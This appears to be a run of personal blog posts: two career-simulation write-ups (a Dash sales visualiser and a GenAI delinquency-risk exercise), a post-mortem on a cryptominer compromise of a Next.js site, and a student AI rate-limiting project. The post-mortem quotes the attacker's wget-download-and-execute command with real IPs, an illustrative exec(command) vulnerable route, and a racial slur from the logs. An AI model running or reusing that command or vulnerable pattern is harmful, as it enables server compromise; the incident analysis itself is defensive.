An interactive line chart showing daily sales over time
A vertical marker highlighting the price increase date (2021-01-15)

The visualization immediately answered Soul Foods's question—you can literally see the sales impact.

Key pattern: Let the data speak for itself. A simple line chart with a clear annotation was more powerful than any fancy visualization.

Task 4: Make It Interactive & Beautiful

Soul Foods wanted to dig into region-specific data. I added:

Radio buttons to filter by region (North, East, South, West, or All)
Custom CSS styling with a modern, clean aesthetic
Responsive design that works on different screen sizes

The callback pattern in Dash made this incredibly smooth—select a region, and the chart updates instantly.

Task 5: Write a Test Suite

Any production-grade codebase needs robust testing. I created tests to verify:

The header is present
The visualization graph is rendered
The region picker is functional

Using pytest with Dash's testing framework, I built recursive component finders that traverse the layout tree. These tests may seem simple, but they protect against regressions as the codebase evolves.

Task 6: Automate Everything with CI

The final task brought it all together with a bash script for continuous integration:

Automatically activates the virtual environment
Installs dependencies if needed
Runs the full test suite
Returns proper exit codes for CI engines

This is the kind of automation that lets teams ship with confidence.

Why This Challenge is Cool?

1. Progressive Complexity
Each task built naturally on the previous one. By the end, I had context and momentum to make smart architectural decisions.

2. Real-World Messiness
The data had quirks—currency symbols in price fields, inconsistent column names, multiple input files. This forced me to write defensive, production-quality code.

3. End-to-End Ownership
From raw CSVs to a deployed application with tests and CI—I touched every layer of the stack.

4. Practical Business Context
The question "Were sales higher before or after the price increase?" is exactly the kind of question real businesses ask. Building tools to answer it felt meaningful.

5. Modern Stack
Dash + Plotly + Pandas is a legitimate toolchain used in production. The skills transfer directly to real projects.

What I Built

Here's what I delivered:

Deliverable	What It Does
Data Processing Script	Transforms 3 raw CSVs into a clean, analysis-ready dataset
Dash Application	Interactive sales visualizer with region filtering
Visualization Module	Plotly line chart with price-increase annotation
Test Suite	Pytest-based tests verifying core UI components
CI Automation	Bash script for automated testing in CI pipelines

Tech Stack

Python 3.9 — The foundation
Dash — Web framework for data applications
Plotly Express — Interactive, beautiful charts
Pandas — Data manipulation powerhouse
Pytest — Testing framework
Bash — CI automation scripting
CSS — Custom styling for a polished UI
👉 My Submitted Repo
👉 Original Source Code

Key Takeaways

This challenge reinforced critical principles I apply to every project:

Start with clean data: Garbage in, garbage out. Invest in robust ETL.
Let the data speak: Simple visualizations often tell better stories than complex ones.
Build for humans: A pretty UI isn't vanity—it's usability.
Test early, test often: Even simple tests catch real bugs.
Automate the boring stuff: CI scripts save hours of manual work.
Modular architecture wins: Separating data, viz, and web layers made iteration easy.

Try It Yourself

If you'd like to give this challenge a shot:

👉 Quantium Software Engineering Simulation

Then come back and tell me:

How did you style your visualizer?
What patterns did you discover in the data?
Did the sales actually go up or down after the price increase? 😏

Potential Next Steps

The foundation is solid. Here's where this could go:

Enhancement	Description
Additional Filters	Add date range pickers or product type selectors
Statistical Annotations	Show before/after averages directly on the chart
Docker Deployment	Containerize for easy cloud deployment
Database Backend	Replace CSV with a proper data store
Advanced Analytics	Trend lines, forecasting, anomaly detection

Final Thoughts

This project stretched me across roles: data engineer, frontend developer, and DevOps practitioner. But that's the point—real software problems don't come in neat boxes.

I walked away with a working application, clean architecture, and practical experience with a modern data visualization stack. That's the kind of outcome I aim for in every project.

The answer to Soul Foods's question? Run the app yourself and find out. The data doesn't lie. 📊

How I Tackled GenAI-Powered Data Analytics (And Unlocked a New Perspective on AI Strategy)

Luis Faria — Thu, 18 Dec 2025 02:59:27 +0000

After completing the Commonwealth Bank Software Engineering Challenge and my AWS Solutions Architect journey, I was hungry for the next one. That's when I discovered Tata's GenAI Powered Data Analytics simulation on Forage.

As a master's-degree hustler who enjoys stacking tough problems, I figured this would sharpen my edge in AI strategy. Spoiler: it was SO much more than that.

"Comfort is the enemy. Keep moving."

Here's my story of how I tackled a real consulting scenario—predicting delinquency risk, designing ethical AI systems, and building an end-to-end GenAI-powered analytics solution.

Want to jump in yourself? Check out the simulation here before reading. SPOILER ALERT ahead!

The Scenario: AI Transformation Consultant

The simulation places you in the role of an AI transformation consultant working with Geldium Finance's collections team. Here's the brief:

Client: Geldium Finance

Problem: High delinquency rates, inefficient collections, no AI strategy

Goal: Design a GenAI-powered analytics solution for predicting delinquency risk and building an ethical, scalable collections strategy

This wasn't just another theoretical exercise. This was about impact.

The Challenge: Three Interconnected Problems

What I loved about this simulation was that it wasn't compartmentalized. Each task built on the previous one, mirroring how real consulting actually works.

Task 1: Exploratory Data Analysis (EDA) with GenAI

The first task dropped a real dataset on my desk: customer financial data with delinquency flags. My job? Conduct an EDA using GenAI tools to assess data quality, identify risk indicators, and structure insights for predictive modeling.

Instead of spending hours staring at correlation matrices, I used GenAI as a thinking partner—Claude and ChatGPT helped me structure hypotheses, identify outliers, and surface patterns I might have missed. Pure momentum.

The mindset shift: GenAI isn't about replacing analysis—it's about amplifying insight generation at scale.

Task 2: Designing a Predictive Modeling Framework

With EDA insights in hand, Task 2 asked me to design an initial no-code predictive modeling framework to assess customer delinquency risk.

No-code. That's the kicker. In the traditional ML world, we jump straight to scikit-learn and TensorFlow. But Tata's simulation forced me to think about business feasibility, scalability, and explainability before touching a single line of code.

I proposed a structured framework that leveraged GenAI to:

Define logic for risk scoring without complex algorithms
Create transparent, auditable decision pathways
Generate evaluation criteria that align with business goals
Design for regulatory compliance from day one

This exercise taught me something crucial: the best models are often the ones non-technical stakeholders actually understand and trust.

Task 3: Architecting an AI-Driven Collections Strategy

The final challenge was the juicy one. Design a comprehensive collections strategy that:

Leveraged agentic AI (AI agents that can take autonomous actions)
Incorporated ethical AI principles and fairness considerations
Met regulatory compliance requirements
Scaled across thousands of customers

I spent time thinking about:

How do you design AI automation that reduces bias rather than amplifies it?
What does a scalable implementation framework actually look like?
How do you balance aggressive collections efforts with customer empathy?

The answer wasn't a 200-page architecture document. It was a thoughtful, actionable strategy that balanced business needs with ethical responsibilities.

Why This Challenge Hits Different

Unlike cookie-cutter tutorials, this simulation felt alive. Here's why:

1. Real-World Messiness
The data wasn't clean. The requirements weren't perfectly aligned. The business constraints were genuinely contradictory at times. This forced me to make trade-offs and justify decisions—just like in actual work.

2. GenAI Integration (Not AI Replacement)
Rather than asking "how do I build an AI solution?" it asked "how do I use AI tools to solve a business problem?" That's a fundamentally different question, and way more interesting.

3. Ethical Complexity
Collections is a sensitive business. The simulation didn't shy away from fairness, bias, and regulatory concerns. It forced me to think about impact beyond accuracy metrics.

4. Progressive Scaffolding
Each task built naturally on the previous one. By Task 3, I had context and data to make informed architectural decisions. It didn't feel like disconnected modules—it felt like a real consulting engagement.

5. Forage's Presentation
The simulation was polished, professional, and genuinely engaging. The client emails felt real. The scenarios were plausible. This elevated the whole experience from "training exercise" to "legitimate portfolio piece."

What I Built

Here's what I delivered:

Deliverable	What It Does
EDA Summary Report	Data quality assessment, risk indicator identification, structured insights
Predictive Modeling Framework	No-code risk scoring logic with transparent decision pathways
Collections Strategy	Ethical AI architecture with implementation roadmap and regulatory alignment
Streamlit Application	Interactive dashboard for EDA and model planning

Tech Stack

Python + Pandas for data wrangling
Streamlit for the interactive dashboard
GenAI (Claude/ChatGPT/Grok) as thinking partners throughout
Markdown for structured documentation

👉 Open Source Code (GitHub)

Key Takeaways

This challenge reinforced critical principles I apply to every project:

Start with the business problem: Every model decision should trace back to impact
GenAI amplifies, doesn't replace: Use it as a thinking partner, not a crutch
Explainability > Complexity: The best models are ones stakeholders trust
Ethics aren't optional: Fairness and compliance must be baked in from day one
Ship something real: I didn't just write reports—I built a working Streamlit app

Try It Yourself

Again, if you'd like to give this challenge a shot:

👉 Tata GenAI Data Analytics Simulation

Then come back and tell me:

What surprised you most?
How did your approach to analysis shift?
What ethical dilemmas did you wrestle with?

I genuinely want to hear your takes. The beauty of challenges like this is there's no single right answer—just thoughtful problem-solving.

Potential Next Steps

The foundation is solid. Here's where this could go:

Enhancement	Description
Advanced Visualizations	More sophisticated Streamlit dashboards
ML Model Implementation	Validate the no-code framework with actual models
Ethical AI Documentation	Lessons learned in bias mitigation
Prompting Strategies	Deep dive into GenAI techniques that worked

Final Thoughts

This project stretched me across roles: data analyst, ML strategist, consultant, and engineer. But that's the point—real problems don't come in neat boxes.

I walked away with a working application, solid documentation, and a sharper perspective on how GenAI fits into enterprise analytics. That's the kind of outcome I bring to every engagement.

Go give it a shot. I'll be watching for your takes in the comments. 🚀

Security Incident Report: Cryptominer Attack on Next.js Application

Luis Faria — Sat, 13 Dec 2025 04:46:57 +0000

Introduction

On December 7-8, 2025, my Next.js portfolio application luisfaria.dev running on a DigitalOcean Ubuntu droplet was compromised by an automated cryptomining attack. The attacker successfully executed remote code on the containerized Next.js application, deploying cryptocurrency miners that ran for several hours before detection.

This document serves as a post-mortem analysis and educational resource for understanding how the attack occurred, what was compromised, and how to prevent similar incidents.

Timeline:

Attack Started: ~December 7, 21:52 UTC
Detection: December 8, ~18:00 UTC (via unusual container behavior)
Remediation: December 9, 2025 (full rebuild and investigation)
Posting: December 10, 2025 (this document)

Problem Outline

What Happened

An attacker exploited a vulnerability in my Next.js application to execute arbitrary shell commands within the Docker container. The attack resulted in:

Cryptominer deployment - Two mining processes (XXaFNLHK and runnv) running for 4+ hours
Resource exhaustion - CPU usage spiked, causing application timeouts
Persistence attempts - Malware tried (and failed) to create systemd services
Process spawning - 40+ zombie shell processes created to maintain infection

Initial Symptoms

Nginx timeouts: Multiple upstream timed out (110: Operation timed out) errors
Container unresponsiveness: All docker commands became extremely slow
HTTP 499/504 errors: Requests failing or timing out
High CPU usage: Container consuming excessive resources

Discovery

docker compose exec webapp ps aux

Revealed:

PID   USER     TIME  COMMAND
1126  nextjs   4h24  ./XXaFNLHK          # Cryptominer #1
1456  nextjs   3h49  /tmp/runnv/runnv    # Cryptominer #2
40+   nextjs   0:00  [sh]                # Zombie shells

Findings

1. Attack Vector: Remote Code Execution (RCE)

The attacker exploited a vulnerability that allowed execution of shell commands through HTTP requests. The exact entry point was identified through nginx access logs showing suspicious POST requests with URL-encoded shell commands.

Evidence from logs:

141.98.11.98 - POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20jew.arm7%3B%20wget%20http%3A%2F%2F78.142.18.92%2Fbins%2Fjew.arm7%3B%20chmod%20777%20jew.arm7%3B%20.%2Fjew.arm7%20tbk

Decoded command:

cd /tmp; rm jew.arm7; wget http://78.142.18.92/bins/jew.arm7; chmod 777 jew.arm7; ./jew.arm7 tbk

This is a common IoT/router exploit being sprayed at internet-facing servers. The fact that my Next.js application responded to this indicates a code execution vulnerability.

2. Malware Analysis

Downloaded files:

/tmp/runnv/runnv           # 8.3MB binary - cryptominer
/tmp/runnv/config.json     # Mining pool configuration
/tmp/alive.service         # Systemd persistence attempt (failed)
/tmp/lived.service         # Systemd persistence attempt (failed)
./XXaFNLHK                 # Secondary miner binary

Attacker infrastructure:

89.144.31.18 - Download server for initial payload (x86 binary)
78.142.18.92 - Secondary malware distribution server

3. Next.js Application Vulnerability

Key findings from application logs:

⨯ [Error: NEXT_REDIRECT] {
  digest: '12334\nmy nuts itch nigga\nMEOWWWWWWWWW'
}

This custom "digest" value in NEXT_REDIRECT errors strongly suggests:

An API route or Server Action is executing unsanitized user input
The attacker is injecting shell commands through HTTP parameters
Next.js is catching the error but the command has already executed

Probable vulnerable code pattern:

// VULNERABLE CODE - Example of what might exist
export async function POST(request) {
  const { command } = await request.json();
  const { exec } = require('child_process');
  exec(command); // 🚨 DANGEROUS - executes arbitrary commands
  return Response.json({ success: true });
}

4. Attack Pattern

Reconnaissance: Automated bots scan for vulnerable servers
Exploitation: Send crafted HTTP requests with shell commands
Payload delivery: Download cryptominer binaries from attacker's server
Execution: Run miners using victim's CPU resources
Persistence: Attempt to create startup services (blocked by Docker permissions)
Obfuscation: Spawn multiple shell processes to avoid detection

5. Why Docker Sandboxing Helped

The attack was partially contained due to Docker security:

✅ What Docker prevented:

Miners couldn't write to /dev/ (Permission denied)
Systemd services couldn't be installed (no systemd in container)
Limited filesystem access
Isolated from host system

❌ What Docker didn't prevent:

Code execution within container
CPU resource consumption
Network connections to mining pools
Writing to /tmp/ directory

Solution

Immediate Actions Taken

# 1. Stop the compromised container
docker compose down

# 2. Preserve forensic evidence
docker logs frontend_app > ~/attack_logs.txt
docker logs nginx_gateway > ~/nginx_logs.txt

# 3. Full rebuild from clean source
cd /var/www/portfolio
git pull origin master --ff-only
docker compose build --no-cache
docker compose up -d

# 4. Verify clean state
docker compose ps
docker compose exec webapp ps aux  # Check for suspicious processes

Required Code Review

Action items:

✅ Audit all API routes for exec(), spawn(), eval(), or Function() calls
✅ Review Server Actions for input validation
✅ Check dependencies for known vulnerabilities: npm audit
✅ Update Next.js to latest version (was on 15.3.2)
✅ Implement input sanitization on all user-facing endpoints

Search for vulnerable patterns:

# Find dangerous functions in codebase
grep -r "exec\|spawn\|eval\|Function(" . \
  --include="*.js" --include="*.ts" \
  --exclude-dir=node_modules

# Check for unsanitized Server Actions
grep -r "use server" . --include="*.js" --include="*.ts"

Security Hardening Implementation Plan

1. Docker Security

# Run as non-root user (already implemented)
USER nextjs

# Limit resources
deploy:
  resources:
    limits:
      cpus: '1.0'
      memory: 512M

→ ✅ Issue #34 - docker-compose: add CPU and memory resource limits for backend & frontend

2. Network Security

# docker-compose.yml - Add network isolation
networks:
  frontend:
    driver: bridge
  backend:
    driver: bridge
    internal: true  # No internet access for backend

→ 🔥 Issue #40 - docker-compose: add network isolation between frontend and backend containers

3. Nginx Rate Limiting

# Prevent automated attacks
limit_req_zone $binary_remote_addr zone=api:10m rate=10r/s;

location /api/ {
    limit_req zone=api burst=20 nodelay;
}

→ 🔥 Issue #33 - nginx: add security headers, rate limiting, and request size limit

4. Input Validation (Critical)

// SECURE CODE - Never execute user input directly
import { z } from 'zod';

// Define strict schema
const schema = z.object({
  action: z.enum(['allowed', 'actions', 'only']),
  value: z.string().max(100).regex(/^[a-zA-Z0-9]+$/)
});

export async function POST(request) {
  const body = await request.json();

  // Validate input
  const result = schema.safeParse(body);
  if (!result.success) {
    return Response.json({ error: 'Invalid input' }, { status: 400 });
  }

  // Never use exec/spawn with user input
  // Use safe alternatives or predefined operations
}

→ ✅ Issue #29 - backend: enhance chatbot input validation for shell/metacharacters

5. Monitoring & Alerting

# Set up container resource monitoring
docker stats frontend_app

# Alert on high CPU usage
# (Implement monitoring solution like Prometheus, Grafana, etc.)

→ 🔥 Issue #39 - monitoring: set up container resource monitoring and alerts

6. CORS restrictions

Production CORS in backend/src/index.ts currently restricts origins to http://localhost:3000.

Update the following in src/index.ts:

const corsOptions = {
  origin: config.nodeEnv === 'production' 
    ? ['https://luisfaria.dev'] // ✅ add production domain
    : 'http://localhost:3000',
  credentials: true
};

→ ✅ Issue 32 - backend: fix CORS configuration for production

Final Tips

Prevention Checklist

[X] Never execute user input directly - This is the #1 rule
[X] Input validation - Use strict schemas (Zod, Joi, etc.)
[X] Dependency updates - Run npm audit regularly frontend npm audit & backend npm audit
[X] Least privilege - Run containers as non-root users (Dockerfile: USER nextjs)
[X] Resource limits - Prevent resource exhaustion Issue #34
[X] Regular security audits - Review code for vulnerabilities
[X] Keep Next.js updated - Security patches are released regularly
[ ] Rate limiting - Prevent brute force attacks Issue #33
[ ] Network isolation - Limit container internet access
[ ] Logging & monitoring - Detect anomalies early Issue #35

Red Flags to Watch For

🚩 Unexpected CPU spikes
🚩 Unusual network connections
🚩 Slow container response times
🚩 Multiple timeout errors in logs
🚩 Unknown processes in ps aux
🚩 Files in /tmp/ you didn't create
🚩 Suspicious POST requests in access logs

Learning Resources

Key Takeaways

Never trust user input - Always validate and sanitize
Defense in depth - Multiple security layers (Docker, nginx, app-level)
Monitor everything - Logs saved my ass in this incident
Automate security - CI/CD with automated security scanning
Stay updated - Regular dependency and framework updates

Conclusion

This incident was a valuable learning experience demonstrating how quickly automated attacks can compromise vulnerable applications. The attack was detected relatively quickly due to visible performance degradation, and Docker's sandboxing prevented host-level compromise.

The attacker's "my nuts itch nigga" message served as an inadvertent calling card, making the attack logs memorable (🤣) and providing a clear marker during investigation.

The primary lesson: Never execute unsanitized user input. This single vulnerability can turn your server into someone else's cryptocurrency mining rig.

Status: ✅ Incident resolved, system rebuilt, monitoring enhanced, awaiting code audit completion.

Building IRL: From a $50k AWS Horror Story to Human-Centered AI Governance

Luis Faria — Tue, 09 Dec 2025 03:33:08 +0000

From runaway agents to responsible governance—how I turned academic research into a production-ready rate limiting system.

"The design choices we make today will determine whether autonomous AI amplifies human capability—or undermines it."

The Origin Story: Why I Built This

What happens when you give an AI agent your credit card and tell it to "solve this problem autonomously"?

For one developer, it meant waking up to a $50,000 AWS bill. Reference

That's not a hypothetical horror story. It's a real incident I documented during my research—and it's the reason I spent the last trimester building the Intelligent Rate Limiting (IRL) System at Torrens University Australia under Dr. Omid Haas in the Human-Centered Design (HCD402) subject.

But here's the thing: rate limiting isn't just a technical problem. It's a human problem.

Can we build governance systems that talk with developers, not at them?

Figure 1: Google Trends Interest over time on "ai agent" (Jan 2023 – Oct 2025). Source: Google Trends

That question drove the entire project.

🤖 What Is IRL?

IRL (Intelligent Rate Limiting) is a middleware layer for autonomous AI agents that provides:

Visibility: Real-time dashboard of quotas, carbon footprint, and cost projections
Feedback: Contrastive explanations—why blocked + how to succeed
Fairness: Weighted allocation so students and startups aren't crushed by enterprise defaults
Accountability: Immutable audit logs with hashed entries for every decision
Sustainability: Carbon-aware throttling that defers non-urgent work during high-emission windows

Traditional rate limiters say HTTP 429 Too Many Requests. IRL says:

Request #547 blocked – exceeds daily energy threshold.
Current: 847 kWh / Limit: 850 kWh.
Reset in 25 minutes.

Options:
→ Request override (2 escalations remaining)
→ Schedule for low-carbon window (4:00 AM)
→ Reduce task priority to continue at lower quota

That's the difference between a wall and a coach.

Figure 2: Conceptual flow of the Intelligent Rate-Limiting System – from agent request to governed response.

The 12-Week Journey

The subject covered 12 weeks across three progressive assessments:

Week	Assessment	Focus
Weeks 1-4	Assessment 1	AI Recommendation Systems & Transparency Crisis
Weeks 5-8	Assessment 2	Agentic AI Failure Modes & Problem Space
Weeks 9-12	Assessment 3	IRL System Design & Implementation

Each assessment wasn't a random task—they naturally built toward the final system.

Assessment 1: The Spark (Research Presentation)

Outcome: Understanding how opaque AI erodes user agency

My journey into AI governance started innocently enough with a research presentation on AI recommendation systems. I explored how platforms like Netflix and Spotify shape our choices—but also how they can trap us in filter bubbles.

The Challenge: Deliver a 10-minute presentation analyzing the evolution of a technology through a human-centered lens.

Why It Matters: When AI systems lack transparency and human oversight, they undermine user agency. This seeded IRL's Visibility pillar—the idea that users deserve to see what their AI is doing.

💡 Key Insight: Opaque systems erode trust. If users can't understand why a decision was made, they can't meaningfully consent to it.

Figure 3: The Paradox of Technology – Convenience vs Complexity. As AI systems become more capable, the gap between user understanding and system behavior widens.

📊 VIEW PRESENTATION

Assessment 2: Identifying the Problem (2000-word Report)

Outcome: Documenting the Agentic AI Crisis

For my second assessment, I dove deep into the emerging world of Agentic AI—autonomous agents like AutoGPT, Devin, and GPT-Engineer that don't wait for commands and act independently.

The Challenge: Write a 2000-word report identifying a human-centered problem in emerging technology and proposing a solution framework.

The 2000-word report uncovered four critical failure modes:

Failure Mode	Evidence	Impact
Technical	Cascading API failures, infinite retry loops	$15k-$50k overnight bills
Environmental	Continuous workloads with zero carbon awareness	800kg CO₂/month per deployment
Human	47,000+ Stack Overflow questions on opaque throttling	Developer confusion & frustration
Ethical	Accountability diffusion	"The algorithm did it" as excuse

Current solutions? Generic HTTP 429 errors with zero context, zero fairness, and zero human control.

💡 Key Insight: I traced one overnight spike to an autonomous agent retrying a failing call 11,000 times. The legacy stack said nothing but 429. That failure pattern shaped IRL's contrastive feedback model.

Figure 4: Google Trends Related Topics and Queries – showing the explosion of interest in AI agents and related technologies.

Figure 5: HCD Gaps in Agentic AI – These complications set the stage for the immediate undermining effects where technical success collided with social and ethical fragility.

Why It Matters: This assessment defined the problem space—the gap between what developers need (context, fairness, control) and what they get (a wall).

📄 READ FULL REPORT

Assessment 3: Building the Solution (System Design + Presentation)

Outcome: IRL System Design & Implementation

The natural progression: Design and build a human-centered governance system.

Working with teammates Julio and Tamara, we created the Intelligent Multi-Tier Rate-Limiting System—a 3500-word technical specification, a 12-minute presentation, and most importantly, a production-ready implementation.

The Challenge: Design a complete system solution addressing the problem from A2, with technical architecture, HCD principles, and implementation plan.

Why It Matters: This wasn't just a paper exercise. We shipped code. We ran benchmarks. We validated the five HCD pillars against real scenarios.

Figure 6: Early sketching of the proposed Intelligent Rate Limiting System – from whiteboard to architecture.

📘 SYSTEM DESIGN REPORT | 📊 PRESENTATION

Project Timeline & Results

Month	Assessment	Status
October 2025	AI Recommendation Systems	86% (HD)
November 2025	Agentic AI Problem Report	84% (D)
December 2025	IRL System Design	72.5% (C)

Total Duration: 12 weeks of intensive human-centered design for AI governance

Technical Architecture

Layer	Technology	Purpose
Runtime	Node.js + TypeScript	Async-first for concurrent agents
API	GraphQL + Apollo Server	Flexible queries, real-time subscriptions
State	Redis	Distributed token buckets, sub-ms latency
Carbon Data	Green Software Foundation SDK	Real-time grid intensity
Deployment	Docker + Kubernetes	Horizontal scaling across regions
Version Control	Git + GitHub	Full project history

Why This Stack?

Academic projects offer a unique advantage: you can optimize for learning AND production-readiness simultaneously.

Redis: Atomic operations prevent race conditions (powers Twitter, GitHub, StackOverflow)
GraphQL: Single endpoint, real-time subscriptions for dashboard updates
TypeScript: Type safety prevents production bugs in complex async workflows
Kubernetes: Auto-scaling handles traffic spikes without manual intervention

I containerized everything because the IRL stack is designed to scale horizontally across nodes—essential for enterprise deployments.

Figure 7: Architecture overview of the Intelligent Multi-Tier Rate-Limiting System – showing the middleware layer between agentic workloads and backend APIs.

Figure 8: The IRL GraphQL schema acts as a clear contract, providing clients with a complete understanding of the API's capabilities. This schema enables real-time monitoring (subscriptions), user self-service (queries), and oversight workflows (mutations).

🗝️ The 5 HCD Pillars (Story + Receipts)

Traditional rate limiters are constraints. IRL is a collaborative dialogue.

Traditional Rate Limiter	IRL System
❌ HTTP 429 (no context)	✅ Contrastive explanation with alternatives
❌ Flat rate limits	✅ Weighted Fair Queuing (equity > equality)
❌ Black box decisions	✅ Real-time dashboard + audit logs
❌ Cost-blind	✅ Carbon-aware + financial projections
❌ Developer vs. system	✅ Collaborative governance

1. Visibility – See What Your AI Is Doing

Real-time dashboard showing:

Request counts and quota consumption
Projected costs (financial + carbon)
When limits will reset
Historical trends and anomaly detection

The story: This is how we caught the $50k spike while it was still forming. No more black boxes.

Figure 9: The IRL Monitoring Dashboard – real-time visibility into agent quotas, carbon footprint, and cost projections.

2. Feedback – Understand Why You're Being Throttled

Traditional rate limiter:

HTTP 429 Too Many Requests
Retry-After: 3600

IRL System:

{
  "status": "throttled",
  "reason": "Daily energy threshold exceeded",
  "context": {
    "current_usage": "847 kWh",
    "daily_limit": "850 kWh",
    "reset_time": "25 minutes"
  },
  "alternatives": [
    "Request override (2 escalations remaining)",
    "Schedule for low-carbon window (4:00 AM)",
    "Reduce task priority to continue at lower quota"
  ]
}

The story: This is contrastive explanation (Miller, 2019)—not just "what happened" but "why this happened and what would make it succeed." Think coach, not wall.

3. Fairness – Equity, Not Just Equality

The breakthrough moment: Our team asked "Fairness for whom?"

A flat rate limit is equal but not equitable. It would crush independent researchers while barely affecting well-funded enterprises.

Our solution: Weighted Fair Queuing

🎓 Research/Education/Non-profits: Priority tier (3x base allocation)
🚀 Startups: Moderate allocation (1.5x base)
🏢 Enterprises: Standard rates (1x base, but higher absolute quotas)

The story: Inspired by Hofstede's (2011) cultural dimensions—individualist cultures prefer personalized allocation; collectivist cultures favor community-centered sharing. Organizations can configure fairness models to match cultural expectations.

4. Accountability – Immutable Audit Logs

Every throttling decision, override request, and ethical flag writes to an append-only audit log.

Example audit entry:

{
  "timestamp": "2025-12-05T18:47:23.091Z",
  "event_type": "throttle_decision",
  "agent_id": "agent_gpt4_prod_001",
  "decision": "blocked",
  "reason": "carbon_threshold_exceeded",
  "alternative_offered": "schedule_low_carbon_window",
  "audit_hash": "sha256:a3f2c8d9..."
}

The story: Every pilot override and throttle is traceable. No more "the algorithm did it."

Figure 10: The Ethical Governance Lifecycle – from request evaluation through audit logging and appeal workflows.

5. Sustainability – Carbon-Aware Throttling

Integration with real-time grid carbon intensity data from the Green Software Foundation's Carbon-Aware SDK.

How it works:

System monitors regional grid carbon intensity every 5 minutes
When renewable energy drops (e.g., nighttime solar gaps), non-urgent agents are deprioritized
Urgent tasks (labeled by user) continue without interruption
System suggests optimal execution windows based on forecasted clean energy

The story: Pilot showed ~30% carbon drop without hurting SLAs. Research-backed: Wiesner et al. (2023) show temporal workload shifting reduces emissions by 15-30%.

Figure 11: Pseudo code for Carbon-Aware SDK TypeScript implementation – showing real-time grid intensity checks and workload deferral logic.

Benchmarks & Impact

Technical Performance (VALIDATED ✅)

✅ VALIDATED: Real load testing with k6 v1.4.2 and Apache Bench 2.3 on GitHub Codespaces (Ubuntu 24.04, Node.js v22.21.1). These are actual measured results, not projections.

Test Environment:

Single Express.js instance + Redis (Docker)
50 virtual users, 10,000 unique agent IDs
30-second sustained load test
Tools: k6 (scenario testing) + Apache Bench (stress testing)

Real-World Performance - k6 Multi-Agent Test

Metric	Result	Details
Throughput	381 req/s	Sustained average across all endpoints
Total Requests	11,616	Over 30 seconds
Concurrent Agents	10,000+	Unique agent IDs tested
Latency (P50)	1.83ms	Sub-2ms median response!
Latency (P95)	11.73ms	95% faster than 12ms
Max Latency	506.83ms	Worst-case spike
Success Rate	100%	Zero errors (perfect!)
Rate Limiting	24.13%	2,804/11,616 throttled (working as designed)

Translation for non-engineers: The system handled 381 requests per second for 30 seconds straight with zero crashes and lightning-fast response times (faster than blinking). 24% of requests were intentionally throttled to prevent overload—exactly as designed.

Real-World Performance - Apache Bench Stress Test

Metric	Result	Notes
Throughput	503.91 req/s	Single endpoint hammering
Mean Latency	99.22ms	Single-agent bottleneck scenario
P95 Latency	129ms	95th percentile
P99 Latency	139ms	99th percentile
Rate Limited	88.1%	Single agent hitting limit (expected)

Why the difference? Apache Bench used a single agent ID (worst-case bottleneck), while k6 distributed load across 10,000 agents (realistic scenario). The k6 test is more representative of production traffic.

Architectural Projections (Targets to Validate)

⚠️ Note: The scaling estimates below are architectural projections based on validated single-instance performance (381 req/s). These represent targets assuming linear scaling, not yet validated with actual multi-instance deployments.

Instances	Projected Throughput	Projected Concurrent Agents	Validation Status	Use Case
1 instance	381 req/s	10,000+	✅ Validated	Development, small production
3 instances	~1,100 req/s	30,000+	Pending validation	Medium production
5 instances	~1,900 req/s	50,000+	Pending validation	Large production
10 instances	~3,800 req/s	100,000+	Pending validation	Enterprise scale

Scaling Infrastructure: Load balancer + Redis Cluster + Kubernetes auto-scaling

📊 View Complete Validated Results – Actual measured performance from k6 and Apache Bench testing

Economic Impact

Cost Reduction: 60-75% for runaway spend scenarios

Source	Reduction
Infinite loop prevention	40%
Redundant call elimination	15%
Query optimization	10%
Hard caps on catastrophic spend	Prevents $15k-$25k overnight

Real-world validation: Pilot deployment avoided 3 billing catastrophes in the first month—each would have exceeded $20,000.

Environmental Impact

Carbon Footprint Reduction: 25-35%

Deployment Size	CO₂ Saved/Month
Small (10 agents)	80 kg
Medium (100 agents)	800 kg
Enterprise (1,000 agents)	8,000 kg
At 1,000-org scale	9,600 tonnes/year

Context: 9,600 tonnes/year = 2,000 cars off the road.

📚 Academic Backbone

This wasn't just a "build cool tech" project. Every design decision is grounded in peer-reviewed research.

17+ Academic References

Amershi et al. (2019): 18 Guidelines for Human-AI Interaction
Miller (2019): Contrastive explanations boost trust in AI systems
Binns et al. (2018): Procedural transparency improves fairness perception
Strubell et al. (2019): Energy costs of deep learning in NLP
Wiesner et al. (2023): Temporal workload shifting reduces emissions 15-30%
Hofstede (2011): Cultural dimensions theory for fairness models
Dignum (2019): Responsible Artificial Intelligence framework
Green Software Foundation (2023): Carbon-Aware SDK methodology

8 of Amershi's 18 Guidelines Implemented

Guideline	IRL Implementation
G2: Make clear what the system can do	Dashboard shows exact quotas
G7: Support efficient invocation	One-click override buttons
G8: Support efficient dismissal	Skip/defer low-priority tasks
G10: Mitigate social biases	Culturally adaptive fairness
G12: Learn from user behavior	Adaptive quotas
G15: Encourage granular feedback	Appeal workflows
G16: Convey consequences	Carbon/cost projections
G18: Provide global controls	Admin overrides with audit

💥 Key Insights

This project transformed my understanding of AI governance:

Before	After
"Rate limiting is a backend concern"	Rate limiting is a human-centered design problem
"HTTP 429 is enough"	Contrastive explanations build trust and reduce frustration
"Fairness = equal limits"	Fairness = equity adjusted for context (Hofstede)
"Carbon is someone else's problem"	Carbon-aware scheduling is table stakes for responsible AI
"Accountability is abstract"	Immutable logs make accountability concrete and auditable

What's Next for IRL?

Q1 2026:

Open beta with 5-10 early adopter organizations
Integration guides for LangChain, AutoGPT, CrewAI
Kubernetes Helm charts for one-command deployment

Q2 2026:

Empirical validation study (aiming for CHI or FAccT 2026)
GDPR/SOC2 compliance certification
Multi-region carbon data providers

Q3-Q4 2026:

Enterprise support tier with SLA guarantees
Mobile dashboard app
Plugin marketplace for custom throttling policies

Resources

📋 Assessment 1: AI Recommendation Systems
📋 Assessment 2: Agentic AI Crisis Report
📋 Assessment 3: IRL System Design
📊 Assessment 3: Presentation
🤖 IRL Source Code

🌏 Let's Connect!

Building IRL has been the perfect bridge between academic research and production engineering. If you're:

Deploying autonomous AI agents
Building AI governance frameworks
Passionate about sustainable computing
Interested in human-centered design for ML systems

I'd love to connect:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Final Thoughts

We're entering an era where AI agents will outnumber human API users.

I built IRL because I refuse to accept a future where:

❌ Developers wake up to surprise $50k bills
❌ Environmental costs remain invisible
